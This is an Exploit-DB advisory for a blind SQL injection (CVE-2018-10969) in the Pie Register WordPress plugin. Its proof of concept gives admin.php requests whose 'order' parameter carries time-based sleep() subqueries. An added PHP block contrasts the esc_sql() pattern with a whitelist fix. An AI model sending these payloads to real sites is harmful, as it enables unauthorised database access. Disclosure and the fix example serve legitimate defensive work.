WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection

  • Author: Manuel García Cárdenas
    Date: 2018-06-11
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/44867/
  • # Title: WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection
    # Author: Manuel García Cárdenas
    # Date: 2018-05-10
    # Software: WordPress Plugin Pie Register 3.0.9
    # CVE: CVE-2018-10969
    
    # I. VULNERABILITY
    # WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection
    
    # II. BACKGROUND
    # Pie-Register is a quick and easy way to brand your Registration Pages on
    # WordPress sites.
    
    # III. DESCRIPTION
    # This bug was found using the portal in the files:
    # /pie-register/classes/invitation_code_pagination.php:if ( isset(
    # $_GET['order'] ) && $_GET['order'] )
    # /pie-register/classes/invitation_code_pagination.php:$order =
    # $_GET['order'];
    # And when the query is executed, the parameter "order" it is not sanitized.
    # /pie-register/classes/invitation_code_pagination.php:$this->order = esc_sql( $order );
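Why esc_sql() is not enough for this parameter, and what a whitelist-based fix looks like, as an added PHP example (this is not the plugin's code; the page shows only that $_GET['order'] passes through esc_sql(), so the query shape, table name and column list are assumptions, and the esc_sql() stub only stands in for WordPress when the file is run on its own):

```php
<?php
// Added example, not the plugin's code. Query shape, table name and column
// list are assumed; the page only shows $_GET['order'] going through esc_sql().

// Stand-in so the file runs outside WordPress. The real esc_sql() escapes
// quotes, backslashes and NUL for use inside a quoted string literal, no more.
if ( ! function_exists( 'esc_sql' ) ) {
    function esc_sql( $s ) { return addslashes( $s ); }
}

// Vulnerable pattern: ORDER BY takes bare identifiers and keywords, not quoted
// strings, so escaping quotes changes nothing. A direction value carrying a
// comma and further SQL is interpolated verbatim and becomes part of the query.
function build_codes_query_vulnerable( $prefix, $orderby, $order ) {
    $orderby = esc_sql( $orderby );
    $order   = esc_sql( $order );
    return "SELECT * FROM {$prefix}pie_invitation_codes ORDER BY $orderby $order";
}

// Hardened pattern: never interpolate request input into ORDER BY. Map the
// request values onto a fixed column list and the two legal directions and
// fall back to defaults otherwise. Note that $wpdb->prepare() placeholders
// cover values only, not identifiers or keywords, so a whitelist is required.
function build_codes_query_safe( $prefix, $orderby, $order ) {
    $allowed_columns = array( 'name', 'code', 'created' ); // assumed column list
    $column    = in_array( $orderby, $allowed_columns, true ) ? $orderby : 'name';
    $direction = ( strtoupper( (string) $order ) === 'ASC' ) ? 'ASC' : 'DESC';
    return "SELECT * FROM {$prefix}pie_invitation_codes ORDER BY `$column` $direction";
}

// Constructed request values: a normal direction and one with extra SQL
// appended after a comma, as the advisory's PoC does.
$samples = array( 'desc', 'desc,1' );

foreach ( $samples as $order ) {
    echo "order={$order}", PHP_EOL;
    // The escaped value is unchanged, so the second sample alters the query.
    echo '  vulnerable: ', build_codes_query_vulnerable( 'wp_', 'name', $order ), PHP_EOL;
    // Anything other than ASC/DESC collapses to the default direction.
    echo '  safe:       ', build_codes_query_safe( 'wp_', 'name', $order ), PHP_EOL;
}
```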
    
    # IV. PROOF OF CONCEPT
    # The following URLs have all been confirmed to suffer from time-based SQL injection.
    
    GET
    /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc
    (original)
    
    GET
    /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a)
    HTTP/1.1(2 seconds of response)
    
    GET
    /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a)
    HTTP/1.1(30 seconds of response)
    
    # V. SYSTEMS AFFECTED
    # Pie Register <= 3.0.9
    
    # VI. DISCLOSURE TIMELINE
    # May 10, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
    # May 10, 2018 2: Sent to vendor, no response
    # June 05, 2018 3: Second email to vendor, no response
    # June 11, 2018 4: Sent to the Full-Disclosure lists
    
    # VII. SOLUTION
    # Disable the plugin until a fix is available.